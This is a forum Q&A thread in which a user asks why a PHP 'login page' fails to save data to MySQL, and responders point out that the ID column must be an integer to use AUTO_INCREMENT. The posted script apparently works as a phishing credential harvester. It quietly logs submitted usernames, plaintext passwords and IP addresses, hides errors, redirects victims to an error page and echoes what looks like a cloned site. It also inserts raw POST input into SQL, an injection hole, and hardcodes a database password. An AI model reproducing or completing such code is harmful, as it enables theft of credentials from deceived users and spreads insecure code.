# I am not able to save my data on mysql

Tags: php, mysql

Hey friends today I am creating my login page which saved user pass on my data base this project is given me in my school and now I am totally frustrated because everything seems to be right but when I am trying to create database it says error ......I already posted screen shot after this **index.php** script...

```
 [<?php
    { //credit
    /* 
    *
    *by nalin
    *
    *PHP ver 5.1.0>
    *Tested on 5.5.27
    *
    *
    */ 
    }
    { //config
    error_reporting(0); //turn off error
    //server address
    $data\[server\] = "localhost";
    //user name
    $data\[username\] = "a0103769_nalin";
    //password here
    $data\[pass\] = "Hydrogen";
    //database name
    $data\[db\] ="a0103769_nalin";
    //table name
    $data\[db2\] ="data";
    //redirect when detect the username/pass is empty
    //prevent the db getting filled with junk aka empty tables
    $header_empty = $_SERVER\['PHP_SELF'\];
    //when it is logged
    $header_success ="error.html";
    }
    { //mod 
    //cloud flare ip converter
    if(isset($_SERVER\["HTTP_CF_CONNECTING_IP"\])){
    $_SERVER\['REMOTE_ADDR'\] = $_SERVER\['HTTP_CF_CONNECTING_IP'\];
    };
    }
    if(isset($_POST\[submit\])){ //Send pass & username to MYSQL
    $id\[name\] = $_POST\[uom\];
    $id\[pass\] = $_POST\[pass\];
    $id\[ip\] = $_SERVER\[REMOTE_ADDR\];
    $idts = gmdate('Y-m-d h:i:s \G\M\T');
    {//empty filler
    if(null == $id\[name\]){
    header("Location: $header_empty");
    die();
    };
    if(null == $id\[pass\]){
    header("Location: $header_empty");
    die();
    };
    }
    $con = mysql_connect($data\[server\],$data\[username\],$data\[pass\]);
    mysql_select_db("$data\[db\]",$con);
    $sql = "INSERT INTO `$data\[db\]`.`$data\[db2\]` (`ID`, `Name`, `Pass`, `IP`, `Time`) VALUES (NULL, '$id\[name\]', '$id\[pass\]', '$id\[ip\]', '$idts')";
    mysql_query($sql);
    mysql_close($con);
    header("Location: $header_success");
    };
    if(!isset($_POST\[submit\])) { //echo the full login page
    echo '
    <html lang="en" data-scribe-reduced-action-queue="true"><!--<!\[endif\]--><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
```

**MySQL Query**

```
CREATE TABLE `a0103769_nalin`.`data` (
    `ID` TEXT NULL DEFAULT NULL AUTO_INCREMENT,
    `Name` TEXT NULL DEFAULT NULL,
    `Password` TEXT NULL DEFAULT NULL,
    `IP` TEXT NULL DEFAULT NULL,
    `Time` TEXT NULL DEFAULT NULL,
    PRIMARY KEY (`ID`)
)
ENGINE = InnoDB;
```

Comment: What all these ``\`` do in your code?

Comment: @u_mulder This php is embeded in html that's why I used [ /] this sign

Comment: You see clearly after php my html code is started in bottom

Comment: @Nalin Nishant Id is not text it should be int

Answer (score 0):

To use AUTO_INCREMENT you need to deifine column as INT or floating-point types, not Text.

AUTO_INCREMENT use only unsigned value, so it's good to use UNSIGNED as well;

```
CREATE TABLE a0103769_nalin.data ( ID INT NULL DEFAULT NULL AUTO_INCREMENT , 
Name TEXT NULL DEFAULT NULL , Password TEXT NULL DEFAULT NULL , IP TEXT NULL    
DEFAULT NULL , Time TEXT NULL DEFAULT NULL , PRIMARY KEY (ID)) ENGINE = InnoDB;
```

Comment: So what I choose to save user data

Comment: **TEXT to INT** for ID column or just run the sql provided in the answer...

Comment: Thanks a lot I am trying

Comment: But it still doesn't save user data MySQL is created

Comment: You have to show you html form and PHP snippets which is doing the insert process. That will help us to help you further...

Answer (score 0):

The datatype of your ID column can't be **TEXT** 
it **should be Integer** type as it is the primary key
AUTO_INCREMENT is used only on INTEGER

Comment: But it still doesn't save user data MySQL is created successfully

Comment: Change your SQL query ... with this

Comment: '(`Name`, `Pass`, `IP`, `Time`) VALUES ('$id\[name\]', '$id\[pass\]', '$id\[ip\]', '$idts')'

Answer (score 0):

As per provided image :

[image]

You are getting error because of wrong datatype of your ID(PRIMARY KEY)column. so you just need to change its datatype from TEXT to INT or what ever int type your system required.

Comment: But it still doesn't save user data MySQL is created successfully

Comment: @NalinNishant, can you show what error are you getting?